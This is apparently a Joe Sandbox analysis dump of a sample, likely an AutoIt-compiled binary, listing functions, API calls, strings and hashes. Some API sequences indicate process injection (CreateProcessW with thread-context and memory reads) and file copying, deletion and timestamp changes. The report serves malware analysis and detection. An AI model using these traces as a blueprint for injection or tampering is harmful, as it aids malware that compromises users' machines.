                        • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 009624FF
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702116243.0000000000960000.00000040.00001000.00020000.00000000.sdmp, Offset: 00960000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_960000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: CreateFileSleep
                        • String ID: LE0ZO3RNCFU1UFOJEXEV7QI
                        • API String ID: 2694422964-1889324611
                        • Opcode ID: fea47391bfe347af9bdf874a602f6abf269d660ca4c97fb712e094dac6c622be
                        • Instruction ID: 3a947de7aa20e406e4823176fd83e8c5888f64111de50c4448893e7b3023aa55
                        • Opcode Fuzzy Hash: fea47391bfe347af9bdf874a602f6abf269d660ca4c97fb712e094dac6c622be
                        • Instruction Fuzzy Hash: F3618270E14288DBEF11DBB4C854BEEBBB9AF55300F144199E209BB2C1D7BA1B44CB65
                        Function 009F2947 Relevance: 7.8, APIs: 5, Instructions: 313fileCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 009F2C05
                        • DeleteFileW.KERNEL32(?), ref: 009F2C87
                        • CopyFileW.KERNELBASE(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 009F2C9D
                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 009F2CAE
                        • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 009F2CC0
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: File$Delete$Copy
                        • String ID:
                        • API String ID: 3226157194-0
                        • Opcode ID: 8d36ea9b8231430247793b93ca6089fd0b8f0202cd405c2f7be922dcbf046d3e
                        • Instruction ID: db5c590cd4916086a1736d80a31349c064743f4d84c39ad3e7cb769c71c23f54
                        • Opcode Fuzzy Hash: 8d36ea9b8231430247793b93ca6089fd0b8f0202cd405c2f7be922dcbf046d3e
                        • Instruction Fuzzy Hash: D1B12D7290111DABDF11EFA4CC85FEEBB7DEF89350F1040A6F609E6151EA349A448BA1
                        Function 00983B1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 952 983b1c-983b27 953 983b99-983b9b 952->953 954 983b29-983b2e 952->954 955 983b8c-983b8f 953->955 954->953 956 983b30-983b48 RegOpenKeyExW 954->956 956->953 957 983b4a-983b69 RegQueryValueExW 956->957 958 983b6b-983b76 957->958 959 983b80-983b8b RegCloseKey 957->959 960 983b78-983b7a 958->960 961 983b90-983b97 958->961 959->955 962 983b7e 960->962 961->962 962->959
                        APIs
                        • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00983B0F,SwapMouseButtons,00000004,?), ref: 00983B40
                        • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00983B0F,SwapMouseButtons,00000004,?), ref: 00983B61
                        • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00983B0F,SwapMouseButtons,00000004,?), ref: 00983B83
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: CloseOpenQueryValue
                        • String ID: Control Panel\Mouse
                        • API String ID: 3677997916-824357125
                        • Opcode ID: 7e35d246d8edee291c3b699eabee9c99b980b7a9f49bf2e7ba48aed96d286a17
                        • Instruction ID: d2e7fd06a1e2244991fea19a49684231b4832544c2af3367a42ba2ff532d1706
                        • Opcode Fuzzy Hash: 7e35d246d8edee291c3b699eabee9c99b980b7a9f49bf2e7ba48aed96d286a17
                        • Instruction Fuzzy Hash: 02112AB5510208FFDB20DFA5DC44AFEB7BCEF04B94B108959A805D7210E2319F419B60
                        Function 009612A0 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                        Download Yara Rule
                        APIs
                        • CreateProcessW.KERNELBASE(?,00000000), ref: 00961A5B
                        • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00961AF1
                        • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00961B13
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702116243.0000000000960000.00000040.00001000.00020000.00000000.sdmp, Offset: 00960000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_960000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Process$ContextCreateMemoryReadThreadWow64
                        • String ID:
                        • API String ID: 2438371351-0
                        • Opcode ID: 75058a4f97cf2fcbd3f6bc15a6ffc08ef8895de4d25848071cc819695d886454
                        • Instruction ID: 1fb1d6d2ba1cb95cd1e58b0b179e06e93f6d41aa2babec6605a05217da1e203c
                        • Opcode Fuzzy Hash: 75058a4f97cf2fcbd3f6bc15a6ffc08ef8895de4d25848071cc819695d886454
                        • Instruction Fuzzy Hash: CE622F30A14258DBEB24CFA4C850BDEB376EF58300F1491A9D10DEB394E77A9E81CB59
                        Function 0098DFD0 Relevance: 6.7, APIs: 2, Strings: 1, Instructions: 1414COMMON
                        Download Yara Rule
                        Strings
                        • Variable must be of type 'Object'., xrefs: 009D32B7
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID:
                        • String ID: Variable must be of type 'Object'.
                        • API String ID: 0-109567571
                        • Opcode ID: 631aa4a44caac55d832aebaded21327b1806e2837988296d4e7788383a15d7fd
                        • Instruction ID: a927caba3451c9947710eb344c2e01ddd275639f7041221442fa14dc3fb48100
                        • Opcode Fuzzy Hash: 631aa4a44caac55d832aebaded21327b1806e2837988296d4e7788383a15d7fd
                        • Instruction Fuzzy Hash: 61C2AD71A00205CFCB24EF98C8A0BADB7B5FF49310F24856AE916AB391D375ED41CB91
                        Function 00983923 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94windowCOMMON
                        Download Yara Rule
                        APIs
                        • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 009C33A2
                          • Part of subcall function 00986B57: _wcslen.LIBCMT ref: 00986B6A
                        • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00983A04
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: IconLoadNotifyShell_String_wcslen
                        • String ID: Line:
                        • API String ID: 2289894680-1585850449
                        • Opcode ID: f02dd03c5128b14d494082d90125cf302d8089f7f1d83ae9405b095422d86aad
                        • Instruction ID: 8440b27f93c684c4f6888cf1139866b9007cc40c3b3d8da7b0cf9a890ad43002
                        • Opcode Fuzzy Hash: f02dd03c5128b14d494082d90125cf302d8089f7f1d83ae9405b095422d86aad
                        • Instruction Fuzzy Hash: 3F31A171408300AAD725FB60DC45BEBB7DCAB80B20F00892EF59997291EB749A49C7C2
                        Function 0099FDDB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                        Download Yara Rule
                        APIs
                        • __CxxThrowException@8.LIBVCRUNTIME ref: 009A0668
                          • Part of subcall function 009A32A4: RaiseException.KERNEL32(?,?,?,009A068A,?,00A51444,?,?,?,?,?,?,009A068A,00981129,00A48738,00981129), ref: 009A3304
                        • __CxxThrowException@8.LIBVCRUNTIME ref: 009A0685
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Exception@8Throw$ExceptionRaise
                        • String ID: Unknown exception
                        • API String ID: 3476068407-410509341
                        • Opcode ID: 63987d728e59babce66011a26d80d7fa43730bb7a31f74ad50bf3975254ea10f
                        • Instruction ID: 877ea1f27790be1ade6ea011a2a473e2c12b35b19bc1233ee1156dcfb12a507b
                        • Opcode Fuzzy Hash: 63987d728e59babce66011a26d80d7fa43730bb7a31f74ad50bf3975254ea10f
                        • Instruction Fuzzy Hash: D2F0F634D0020D77CF00B6A8E856E9EB76C6EC2354B604531B828D65D1EF71EA65C5C0
                        Function 009F3017 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                        Download Yara Rule
                        APIs
                        • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 009F302F
                        • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 009F3044
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Temp$FileNamePath
                        • String ID: aut
                        • API String ID: 3285503233-3010740371
                        • Opcode ID: 93ed60f92d95c2a5b0d0c6e7980a351a1dbd11fb816d7ec1e911b1d04289380c
                        • Instruction ID: 9a1b68961e416a6b26187e4b75ffeb5dd950e09ec3240808dc00bb8c3de4cf53
                        • Opcode Fuzzy Hash: 93ed60f92d95c2a5b0d0c6e7980a351a1dbd11fb816d7ec1e911b1d04289380c
                        • Instruction Fuzzy Hash: 62D05EB654032877DA20E7E4AC0EFCB3A6CDB05760F0006A1B655E2091DAF09985CAD0
                        Function 00A07F59 Relevance: 4.9, APIs: 3, Instructions: 430COMMON
                        Download Yara Rule
                        APIs
                        • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00A082F5
                        • TerminateProcess.KERNEL32(00000000), ref: 00A082FC
                        • FreeLibrary.KERNEL32(?,?,?,?), ref: 00A084DD
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Process$CurrentFreeLibraryTerminate
                        • String ID:
                        • API String ID: 146820519-0
                        • Opcode ID: 0f273881d4430bbce442ff7ecde910f65f7809c1ea5f0b90d67759ed99b3630c
                        • Instruction ID: 2d3dca1ca44dd09374501095085485b8431805b4cfab087675a1bea53a731f91
                        • Opcode Fuzzy Hash: 0f273881d4430bbce442ff7ecde910f65f7809c1ea5f0b90d67759ed99b3630c
                        • Instruction Fuzzy Hash: 43128A71A083059FC714DF28D484B6ABBE1BF88318F04895DE8998B392DB35ED45CF96
                        Function 009B5AA9 Relevance: 4.7, APIs: 3, Instructions: 186COMMONLIBRARYCODE
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f8988fa97faa82676f35d5cb7728323d140818e005969d0396274afb40ea12af
                        • Instruction ID: 8e46a4f7cc161f8a70984ec467673a950c03f53333387d995dab81566f8f621d
                        • Opcode Fuzzy Hash: f8988fa97faa82676f35d5cb7728323d140818e005969d0396274afb40ea12af
                        • Instruction Fuzzy Hash: 6D51B071D006199BCB21AFE4CA45FEEBFB9EF46330F160459F405A7291D7359901CB61
                        Function 009810F3 Relevance: 4.7, APIs: 3, Instructions: 153comCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00981BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00981BF4
                          • Part of subcall function 00981BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00981BFC
                          • Part of subcall function 00981BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00981C07
                          • Part of subcall function 00981BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00981C12
                          • Part of subcall function 00981BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00981C1A
                          • Part of subcall function 00981BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00981C22
                          • Part of subcall function 00981B4A: RegisterWindowMessageW.USER32(00000004,?,009812C4), ref: 00981BA2
                        • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0098136A
                        • OleInitialize.OLE32 ref: 00981388
                        • CloseHandle.KERNEL32(00000000,00000000), ref: 009C24AB
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                        • String ID:
                        • API String ID: 1986988660-0
                        • Opcode ID: 524f81083c7d9c7628426b6c5c7610bb49d903d22f2a66e7bfc377619be806d7
                        • Instruction ID: fcb44e24441b34e39db6503841c8f647f4fc8ff28c5d99ff54fddd440242d44f
                        • Opcode Fuzzy Hash: 524f81083c7d9c7628426b6c5c7610bb49d903d22f2a66e7bfc377619be806d7
                        • Instruction Fuzzy Hash: 147188B49113008FC794EFF9A945BB53AE4FB88396754962AE40AC7361FB304887CF55
                        Function 009854C6 Relevance: 4.6, APIs: 3, Instructions: 103COMMON
                        Download Yara Rule
                        APIs
                        • SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000001,?,00000000), ref: 0098556D
                        • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001), ref: 0098557D
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: FilePointer
                        • String ID:
                        • API String ID: 973152223-0
                        • Opcode ID: 3328b2ac0c1d91df6b00cda215390ce8c1b39eb5a3cf98b443caf01b6288f84d
                        • Instruction ID: d0cd5987ebd8febcff58d3818d9e5b11102389b93b960ffef3a00144dd87689e
                        • Opcode Fuzzy Hash: 3328b2ac0c1d91df6b00cda215390ce8c1b39eb5a3cf98b443caf01b6288f84d
                        • Instruction Fuzzy Hash: 36314971A00A09EFDB14DF68C880B99B7B6FB48314F158629F91997340D775FE98CB90
                        Function 009B86AE Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • FindCloseChangeNotification.KERNELBASE(00000000,00000000,?,?,009B85CC,?,00A48CC8,0000000C), ref: 009B8704
                        • GetLastError.KERNEL32(?,009B85CC,?,00A48CC8,0000000C), ref: 009B870E
                        • __dosmaperr.LIBCMT ref: 009B8739
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: ChangeCloseErrorFindLastNotification__dosmaperr
                        • String ID:
                        • API String ID: 490808831-0
                        • Opcode ID: 056edbde636084b437eb45927fb763170576ff216f03f00e218a9c8ee05742c4
                        • Instruction ID: 81dfb9f7f7031f7b0e52e78edae8a4d56680117364680a687ac6056d4c9f3376
                        • Opcode Fuzzy Hash: 056edbde636084b437eb45927fb763170576ff216f03f00e218a9c8ee05742c4
                        • Instruction Fuzzy Hash: 8B014E32605720A6D664B374AB49BFF678D4BCA778F39011DF8148B1D2DEA1CC81C190
                        Function 009F2FD8 Relevance: 4.5, APIs: 3, Instructions: 27filetimeCOMMON
                        Download Yara Rule
                        APIs
                        • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,009F2CD4,?,?,?,00000004,00000001), ref: 009F2FF2
                        • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,009F2CD4,?,?,?,00000004,00000001,?,?,00000004,00000001), ref: 009F3006
                        • CloseHandle.KERNEL32(00000000,?,009F2CD4,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 009F300D
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: File$CloseCreateHandleTime
                        • String ID:
                        • API String ID: 3397143404-0
                        • Opcode ID: 8fb36017651820bf724b5baf22dc875865c2a1797cbec25d6cc861068b0b670c
                        • Instruction ID: db3400f59308c74d812ab7b86ff1751eb4b30b7265035fb5923480b44d78d283
                        • Opcode Fuzzy Hash: 8fb36017651820bf724b5baf22dc875865c2a1797cbec25d6cc861068b0b670c
                        • Instruction Fuzzy Hash: FDE086322C022477D2302795BC0DFDB3A1CD786B71F108210F729790D086A0160243A8
                        Function 00991310 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON
                        Download Yara Rule
                        APIs
                        • __Init_thread_footer.LIBCMT ref: 009917F6
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Init_thread_footer
                        • String ID: CALL
                        • API String ID: 1385522511-4196123274
                        • Opcode ID: cd57f0ade303e14bc7281bd9d2148c505bedf78cd4f32a0aa575514064e5ebc2
                        • Instruction ID: 806f96a69fe22500487632e180f5019eb171a6b433cffbc48926f41726dd2d25
                        • Opcode Fuzzy Hash: cd57f0ade303e14bc7281bd9d2148c505bedf78cd4f32a0aa575514064e5ebc2
                        • Instruction Fuzzy Hash: DE227B706083029FCB14DF18C494B2ABBF5BF89314F29895DF4968B3A1D735E885CB92
                        Function 009F6EF1 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 297COMMON
                        Download Yara Rule
                        APIs
                        • _wcslen.LIBCMT ref: 009F6F6B
                          • Part of subcall function 00984ECB: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00A51418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00984EFD
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: LibraryLoad_wcslen
                        • String ID: >>>AUTOIT SCRIPT<<<
                        • API String ID: 3312870042-2806939583
                        • Opcode ID: 6c80b3348d2d2c9170e8f2dbb493fd0f3a47b532b9b8f28d622612feef2e9f60
                        • Instruction ID: d616c102480d9e64557e4b32f36a59174a8a73d85725ff9e68016ff70ed1a49c
                        • Opcode Fuzzy Hash: 6c80b3348d2d2c9170e8f2dbb493fd0f3a47b532b9b8f28d622612feef2e9f60
                        • Instruction Fuzzy Hash: 5FB14A311082058FDB14EF60C491ABAB7E5AFD4314F14895DF5969B2A2EB30ED49CB92
                        Function 00982DE3 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON
                        Download Yara Rule
                        APIs
                        • GetOpenFileNameW.COMDLG32(?), ref: 009C2C8C
                          • Part of subcall function 00983AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00983A97,?,?,00982E7F,?,?,?,00000000), ref: 00983AC2
                          • Part of subcall function 00982DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00982DC4
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Name$Path$FileFullLongOpen
                        • String ID: X
                        • API String ID: 779396738-3081909835
                        • Opcode ID: 7c1c18529d7b9cf126316958ca09f9f39be2fb371541eacf9ed3ff7677da27ef
                        • Instruction ID: 17f0e6e01c506b4f12c835024bd5e3d25b6d23b94be763c6ba755ab8cb516238
                        • Opcode Fuzzy Hash: 7c1c18529d7b9cf126316958ca09f9f39be2fb371541eacf9ed3ff7677da27ef
                        • Instruction Fuzzy Hash: B221A571E002589FCF01EF94C845BEE7BFCAF89715F008059E405AB341DBB85A498FA2
